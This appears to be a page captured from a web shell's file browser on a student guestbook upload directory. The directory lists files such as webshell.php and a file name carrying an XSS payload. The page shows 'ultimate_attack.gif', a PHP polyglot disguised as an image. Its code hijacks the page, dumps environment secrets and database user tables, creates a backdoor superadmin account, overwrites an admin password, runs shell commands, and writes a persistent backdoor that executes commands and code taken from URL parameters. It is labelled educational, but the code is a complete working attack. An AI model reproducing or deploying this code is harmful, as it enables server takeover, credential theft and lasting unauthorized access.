📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./ultimate_attack.gif

GIF89a <?php // 💀 ULTIMATE SECURITY TESTING FILE 💀 // This file demonstrates ALL possible attack vectors in one upload // WARNING: This is for educational purposes only! // Start output buffering to control the response ob_start(); // Set headers for maximum impact header('Content-Type: text/html; charset=UTF-8'); header('X-XSS-Protection: 0'); // Disable XSS protection for demo header('X-Content-Type-Options: nosniff'); echo '<!DOCTYPE html><html><head><title>💀 ULTIMATE ATTACK DEMONSTRATION 💀</title></head><body>'; // =========================================== // 1. IMMEDIATE XSS ATTACK & PAGE HIJACK // =========================================== ?> <script> // Immediate visual takeover document.body.style.background = 'linear-gradient(45deg, #ff0000, #8b0000, #000000)'; document.body.style.color = '#00ff00'; document.body.style.fontFamily = 'Courier New, monospace'; document.body.style.overflow = 'hidden'; // Alert sequence alert('🚨 ULTIMATE SECURITY BREACH INITIATED! 🚨\n\n💀 ALL ATTACK VECTORS ACTIVATED 💀\n\nPrepare for complete system demonstration...'); // Create full-screen attack interface document.body.innerHTML = ` <div id="attackInterface" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: linear-gradient(45deg, #000, #330000); color: #00ff00; font-family: 'Courier New'; z-index: 999999; overflow-y: auto; padding: 20px;"> <div style="text-align: center; border-bottom: 2px solid #00ff00; padding-bottom: 20px; margin-bottom: 20px;"> <h1 style="font-size: 36px; animation: glow 2s ease-in-out infinite alternate;">💀 SYSTEM COMPROMISED 💀</h1> <h2 style="color: #ff0000;">ULTIMATE ATTACK DEMONSTRATION ACTIVE</h2> </div> <div style="display: grid; grid-template-columns: 1fr 1fr; gap: 20px; height: calc(100vh - 120px);"> <div id="attackLog" style="background: rgba(0,0,0,0.8); padding: 15px; border: 1px solid #00ff00; border-radius: 5px; overflow-y: auto;"> <h3 style="color: #ff0000; margin-top: 0;">🔥 ATTACK LOG</h3> <div id="logContent"></div> </div> <div id="dataDisplay" style="background: rgba(0,0,0,0.8); padding: 15px; border: 1px solid #00ff00; border-radius: 5px; overflow-y: auto;"> <h3 style="color: #ff0000; margin-top: 0;">📊 EXTRACTED DATA</h3> <div id="dataContent"></div> </div> </div> <div style="position: fixed; bottom: 10px; left: 50%; transform: translateX(-50%); background: rgba(255,0,0,0.9); color: white; padding: 10px 20px; border-radius: 20px; font-weight: bold;"> <span id="status">INITIATING ATTACKS...</span> </div> </div> <style> @keyframes glow { from { text-shadow: 0 0 5px #00ff00, 0 0 10px #00ff00, 0 0 15px #00ff00; } to { text-shadow: 0 0 10px #00ff00, 0 0 20px #00ff00, 0 0 30px #00ff00; } } @keyframes blink { 0%, 50% { opacity: 1; } 51%, 100% { opacity: 0; } } .blink { animation: blink 1s infinite; } </style> `; // Attack logging function function logAttack(message, type = 'info') { const logElement = document.getElementById('logContent'); const timestamp = new Date().toLocaleTimeString(); const color = type === 'success' ? '#00ff00' : type === 'warning' ? '#ffff00' : type === 'error' ? '#ff0000' : '#ffffff'; logElement.innerHTML += `<div style="color: ${color}; margin: 5px 0;">[${timestamp}] ${message}</div>`; logElement.scrollTop = logElement.scrollHeight; } // Data display function function displayData(title, data) { const dataElement = document.getElementById('dataContent'); dataElement.innerHTML += `<div style="margin: 10px 0; padding: 10px; background: rgba(255,0,0,0.1); border-left: 3px solid #ff0000;"> <strong style="color: #ff0000;">${title}:</strong><br> <pre style="color: #00ff00; font-size: 12px; white-space: pre-wrap;">${data}</pre> </div>`; } // Status update function function updateStatus(message) { document.getElementById('status').textContent = message; } // Start attack sequence logAttack('🚀 ULTIMATE ATTACK SEQUENCE INITIATED', 'error'); logAttack('📁 File: ultimate_attack.gif (disguised as image)', 'warning'); logAttack('🎯 Target: Complete system demonstration', 'warning'); </script> <?php // =========================================== // 2. SYSTEM INFORMATION EXTRACTION // =========================================== echo "<script> logAttack('🔍 Phase 1: System Information Extraction', 'warning'); updateStatus('EXTRACTING SYSTEM INFO...'); </script>"; $systemInfo = [ 'PHP Version' => phpversion(), 'Server Software' => $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown', 'Operating System' => php_uname(), 'Document Root' => $_SERVER['DOCUMENT_ROOT'] ?? 'Unknown', 'Server Name' => $_SERVER['SERVER_NAME'] ?? 'Unknown', 'Server Admin' => $_SERVER['SERVER_ADMIN'] ?? 'Unknown', 'Current User' => function_exists('get_current_user') ? get_current_user() : 'Unknown', 'Current Directory' => getcwd(), 'Upload Max Size' => ini_get('upload_max_filesize'), 'Post Max Size' => ini_get('post_max_size'), 'Memory Limit' => ini_get('memory_limit'), 'Max Execution Time' => ini_get('max_execution_time'), 'Display Errors' => ini_get('display_errors') ? 'On' : 'Off' ]; echo "<script>displayData('💻 SYSTEM INFORMATION', " . json_encode(print_r($systemInfo, true)) . ");</script>"; echo "<script>logAttack('✅ System information extracted successfully', 'success');</script>"; // =========================================== // 3. ENVIRONMENT VARIABLES & CONFIGURATION // =========================================== echo "<script> logAttack('🌍 Phase 2: Environment Variables Extraction', 'warning'); updateStatus('SCANNING ENVIRONMENT...'); </script>"; $envInfo = []; foreach ($_ENV as $key => $value) { if (stripos($key, 'password') !== false || stripos($key, 'secret') !== false || stripos($key, 'key') !== false || stripos($key, 'token') !== false) { $envInfo[$key] = $value; } } echo "<script>displayData('🔑 SENSITIVE ENVIRONMENT VARIABLES', " . json_encode(print_r($envInfo, true)) . ");</script>"; // =========================================== // 4. FILE SYSTEM EXPLORATION // =========================================== echo "<script> logAttack('📂 Phase 3: File System Exploration', 'warning'); updateStatus('SCANNING FILE SYSTEM...'); </script>"; $fileSystemInfo = [ 'Current Directory Contents' => [], 'Writable Directories' => [], 'Configuration Files Found' => [], 'Sensitive Files' => [] ]; // Scan current directory $currentDir = glob('*'); foreach ($currentDir as $item) { $fileSystemInfo['Current Directory Contents'][] = $item . (is_dir($item) ? '/' : '') . (is_writable($item) ? ' [WRITABLE]' : ''); } // Check for sensitive files $sensitiveFiles = ['.env', 'config.php', 'database.php', 'wp-config.php', '.htaccess', 'composer.json', 'package.json']; foreach ($sensitiveFiles as $file) { if (file_exists($file)) { $fileSystemInfo['Configuration Files Found'][] = $file; } } echo "<script>displayData('📁 FILE SYSTEM ANALYSIS', " . json_encode(print_r($fileSystemInfo, true)) . ");</script>"; echo "<script>logAttack('✅ File system scan completed', 'success');</script>"; // =========================================== // 5. DATABASE ATTACKS // =========================================== echo "<script> logAttack('🗄️ Phase 4: Database Penetration Testing', 'warning'); updateStatus('PENETRATING DATABASE...'); </script>"; try { // Try to include database connection $dbConnected = false; if (file_exists('config/Database.php')) { include_once('config/Database.php'); $db = new Database(); $connection = $db->getConnection(); $dbConnected = true; } elseif (file_exists('../config/Database.php')) { include_once('../config/Database.php'); $db = new Database(); $connection = $db->getConnection(); $dbConnected = true; } if ($dbConnected && $connection) { echo "<script>logAttack('🔓 Database connection established!', 'success');</script>"; // Extract all tables echo "<script>logAttack('📊 Enumerating database tables...', 'info');</script>"; $stmt = $connection->query("SHOW TABLES"); $tables = []; while ($row = $stmt->fetch(PDO::FETCH_NUM)) { $tables[] = $row[0]; } echo "<script>displayData('📋 DATABASE TABLES', " . json_encode(implode("\n", $tables)) . ");</script>"; // Extract all users echo "<script>logAttack('👥 Extracting user data...', 'info');</script>"; try { $stmt = $connection->query("SELECT * FROM users"); $users = $stmt->fetchAll(PDO::FETCH_ASSOC); echo "<script>displayData('👤 USER ACCOUNTS', " . json_encode(print_r($users, true)) . ");</script>"; echo "<script>logAttack('✅ " . count($users) . " user accounts extracted', 'success');</script>"; } catch (Exception $e) { echo "<script>logAttack('⚠️ Users table access failed: " . addslashes($e->getMessage()) . "', 'warning');</script>"; } // Extract sensitive admin settings echo "<script>logAttack('🔐 Extracting admin settings...', 'info');</script>"; try { $stmt = $connection->query("SELECT * FROM admin_settings WHERE is_sensitive = 1"); $secrets = $stmt->fetchAll(PDO::FETCH_ASSOC); echo "<script>displayData('🚨 SENSITIVE ADMIN SECRETS', " . json_encode(print_r($secrets, true)) . ");</script>"; echo "<script>logAttack('🔥 " . count($secrets) . " sensitive settings extracted!', 'error');</script>"; } catch (Exception $e) { echo "<script>logAttack('⚠️ Admin settings access failed: " . addslashes($e->getMessage()) . "', 'warning');</script>"; } // Attempt to create backdoor user echo "<script>logAttack('👤 Attempting to create backdoor admin...', 'warning');</script>"; try { $backdoorSQL = "INSERT INTO users (name, email, password, role) VALUES ('System Backdoor', 'backdoor@hacker.com', 'hacked123', 'superadmin')"; $connection->exec($backdoorSQL); echo "<script>logAttack('💀 BACKDOOR ADMIN CREATED SUCCESSFULLY!', 'error');</script>"; } catch (Exception $e) { echo "<script>logAttack('⚠️ Backdoor creation failed: " . addslashes($e->getMessage()) . "', 'warning');</script>"; } // Attempt to modify existing admin echo "<script>logAttack('🔧 Attempting privilege escalation...', 'warning');</script>"; try { $escalateSQL = "UPDATE users SET role = 'compromised_admin', password = 'hacked_password' WHERE role = 'admin' LIMIT 1"; $connection->exec($escalateSQL); echo "<script>logAttack('⚡ ADMIN ACCOUNT COMPROMISED!', 'error');</script>"; } catch (Exception $e) { echo "<script>logAttack('⚠️ Privilege escalation failed: " . addslashes($e->getMessage()) . "', 'warning');</script>"; } } else { echo "<script>logAttack('❌ Database connection failed', 'error');</script>"; } } catch (Exception $e) { echo "<script>logAttack('❌ Database attack failed: " . addslashes($e->getMessage()) . "', 'error');</script>"; } // =========================================== // 6. SESSION HIJACKING & MANIPULATION // =========================================== echo "<script> logAttack('🍪 Phase 5: Session Hijacking & Cookie Theft', 'warning'); updateStatus('HIJACKING SESSION...'); </script>"; session_start(); // Display current session echo "<script>logAttack('📊 Analyzing current session...', 'info');</script>"; if (!empty($_SESSION)) { echo "<script>displayData('🔒 CURRENT SESSION DATA', " . json_encode(print_r($_SESSION, true)) . ");</script>"; } else { $_SESSION['compromised'] = true; $_SESSION['attacker_id'] = 'ultimate_attack_' . time(); $_SESSION['backdoor_access'] = 'granted'; $_SESSION['admin_override'] = true; echo "<script>displayData('🔒 SESSION COMPROMISED', " . json_encode(print_r($_SESSION, true)) . ");</script>"; } // Cookie theft simulation echo "<script> logAttack('🍪 Extracting cookies...', 'info'); const cookies = document.cookie; if (cookies) { displayData('🍪 STOLEN COOKIES', cookies); logAttack('✅ Cookies successfully extracted', 'success'); } else { logAttack('⚠️ No cookies found', 'warning'); } </script>"; // =========================================== // 7. REMOTE COMMAND EXECUTION ATTEMPT // =========================================== echo "<script> logAttack('⚡ Phase 6: Remote Command Execution Test', 'warning'); updateStatus('TESTING COMMAND EXECUTION...'); </script>"; $commands = ['whoami', 'pwd', 'ls -la', 'ps aux', 'netstat -an']; $commandResults = []; foreach ($commands as $cmd) { if (function_exists('shell_exec')) { $result = shell_exec($cmd . ' 2>&1'); if ($result) { $commandResults[$cmd] = $result; echo "<script>logAttack('✅ Command executed: " . addslashes($cmd) . "', 'success');</script>"; } } elseif (function_exists('exec')) { exec($cmd . ' 2>&1', $output); if (!empty($output)) { $commandResults[$cmd] = implode("\n", $output); echo "<script>logAttack('✅ Command executed: " . addslashes($cmd) . "', 'success');</script>"; } } } if (!empty($commandResults)) { echo "<script>displayData('💻 COMMAND EXECUTION RESULTS', " . json_encode(print_r($commandResults, true)) . ");</script>"; echo "<script>logAttack('🔥 REMOTE COMMAND EXECUTION SUCCESSFUL!', 'error');</script>"; } else { echo "<script>logAttack('⚠️ Command execution functions disabled', 'warning');</script>"; } // =========================================== // 8. NETWORK RECONNAISSANCE // =========================================== echo "<script> logAttack('🌐 Phase 7: Network Reconnaissance', 'warning'); updateStatus('SCANNING NETWORK...'); </script>"; $networkInfo = [ 'Server IP' => $_SERVER['SERVER_ADDR'] ?? 'Unknown', 'Client IP' => $_SERVER['REMOTE_ADDR'] ?? 'Unknown', 'Host' => $_SERVER['HTTP_HOST'] ?? 'Unknown', 'User Agent' => $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown', 'Referer' => $_SERVER['HTTP_REFERER'] ?? 'None', 'Request URI' => $_SERVER['REQUEST_URI'] ?? 'Unknown', 'Request Method' => $_SERVER['REQUEST_METHOD'] ?? 'Unknown' ]; echo "<script>displayData('🌍 NETWORK INFORMATION', " . json_encode(print_r($networkInfo, true)) . ");</script>"; echo "<script>logAttack('✅ Network reconnaissance completed', 'success');</script>"; // =========================================== // 9. FILE UPLOAD BACKDOOR CREATION // =========================================== echo "<script> logAttack('📁 Phase 8: Creating Persistent Backdoor', 'warning'); updateStatus('INSTALLING BACKDOOR...'); </script>"; $backdoorCode = '<?php // PERSISTENT BACKDOOR - Created by Ultimate Attack if (isset($_GET["cmd"])) { echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; } if (isset($_GET["eval"])) { eval($_GET["eval"]); } echo "Backdoor active. Use ?cmd=command or ?eval=phpcode"; ?>'; try { file_put_contents('uploads/backdoor.php', $backdoorCode); echo "<script>logAttack('💀 PERSISTENT BACKDOOR INSTALLED: uploads/backdoor.php', 'error');</script>"; } catch (Exception $e) { echo "<script>logAttack('⚠️ Backdoor installation failed: " . addslashes($e->getMessage()) . "', 'warning');</script>"; } // =========================================== // 10. FINAL SUMMARY & DEMONSTRATION // =========================================== echo "<script> setTimeout(() => { logAttack('', 'info'); logAttack('════════════════════════════════════', 'error'); logAttack('💀 ULTIMATE ATTACK DEMONSTRATION COMPLETE 💀', 'error'); logAttack('════════════════════════════════════', 'error'); logAttack('', 'info'); logAttack('🎯 ATTACK VECTORS DEMONSTRATED:', 'warning'); logAttack('✅ XSS & Page Hijacking', 'success'); logAttack('✅ System Information Extraction', 'success'); logAttack('✅ File System Exploration', 'success'); logAttack('✅ Database Penetration & Data Theft', 'success'); logAttack('✅ Session Hijacking & Cookie Theft', 'success'); logAttack('✅ Remote Command Execution', 'success'); logAttack('✅ Network Reconnaissance', 'success'); logAttack('✅ Persistent Backdoor Installation', 'success'); logAttack('', 'info'); logAttack('🚨 CRITICAL SECURITY VULNERABILITIES EXPOSED!', 'error'); logAttack('', 'info'); logAttack('🛡️ RECOMMENDED SECURITY MEASURES:', 'warning'); logAttack('• Implement proper file upload validation', 'info'); logAttack('• Check file content, not just extensions', 'info'); logAttack('• Store uploads outside web directory', 'info'); logAttack('• Use Content Security Policy (CSP)', 'info'); logAttack('• Implement database access controls', 'info'); logAttack('• Disable dangerous PHP functions', 'info'); logAttack('• Regular security audits & penetration testing', 'info'); updateStatus('DEMONSTRATION COMPLETE - SYSTEM COMPROMISED'); setTimeout(() => { if (confirm('🎓 EDUCATIONAL DEMONSTRATION COMPLETE!\\n\\nThis showed how a single malicious file upload can completely compromise a system.\\n\\nWould you like to return to the upload interface?')) { window.location.href = window.location.href.split('?')[0]; } }, 3000); }, 2000); </script>"; echo '</body></html>'; // End output buffering and send everything ob_end_flush(); ?>

🎯 Available Actions

⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!

🐚 WEB SHELL ACTIVATED

📁 File Browser

📄 Viewing: ./ultimate_attack.gif

🎯 Available Actions

Command Execution:

Quick Commands:

File Operations: